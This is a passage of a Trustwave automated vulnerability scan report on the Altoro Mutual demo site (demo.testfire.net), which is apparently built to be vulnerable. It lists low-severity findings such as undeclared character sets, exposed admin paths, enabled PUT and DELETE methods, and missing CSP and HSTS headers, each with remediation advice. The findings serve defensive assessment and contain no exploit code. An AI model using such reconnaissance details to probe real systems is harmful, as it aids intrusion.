documents that were missing any indication of their character set
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 757 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://demo.testfire.net/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 758 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://demo.testfire.net/swagger/index.html
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 759 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://demo.testfire.net:443/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 760 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Evidence:
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA
Remediation:
No remediation is necessary.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 761 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 762 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat, apache:tomcat
Evidence:
application_cpe: cpe:/a:apache:tomcat, cpe:/a:apache:tomcat
application_name: apache:tomcat, apache:tomcat
application_protocol: http
ip_address: 65.61.137.117
port_number: 8080
transport_protocol: tcp
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 763 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET https://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 764 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 765 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 766 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 767 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 768 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="
128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 769 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 770 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 771 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 772 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
During the crawl of the HTTP service, we detected HTML and/or XML
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 773 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://demo.testfire.net:8443/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 774 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://demo.testfire.net:8443/swagger/index.html
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 775 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://65.61.137.117:8443/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 776 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: http://65.61.137.117:8080/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 777 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
HTTP Response Code: 302
URL: http://demo.testfire.net:8080/bank/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 778 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://demo.testfire.net:8080/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 779 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://65.61.137.117:8443/bank/
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 780 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://65.61.137.117:8443/swagger/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 781 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://65.61.137.117:8443/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 782 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 783 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 784 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET https://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 785 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 786 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 787 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 788 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 789 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="
128" /></center>
<br /><br/>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 790 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 791 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 792 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 793 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 794 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 795 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
482 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: demo.testfire.net
ip_address: 65.61.137.117
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 796 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
Evidence:
DetectionDetails: No HSTS implemented for HTTPS
Request: GET https://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Example of response header use-
Strict-Transport-Security: max-age=31536000
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 797 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
https://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 798 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 799 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
Requesting the allowed HTTP OPTIONS from this host shows which
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 800 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://65.61.137.117/swagger/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
492 Enumerated Hostnames 0.0 Info Pass This list contains all hostnames discovered during the scan that are
believed to belong to this host.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
Hostname: altoromutual.com, Source: SSL Certificate Subject Common
Name
Hostname: altoromutual.com, Source: SSL Certificate Subject
subjectAltName DNS
Hostname: www.altoromutual.com, Source: SSL Certificate Subject
subjectAltName DNS
Hostname: demo.testfire.net, Source: SSL Certificate Subject
subjectAltName DNS
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 801 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
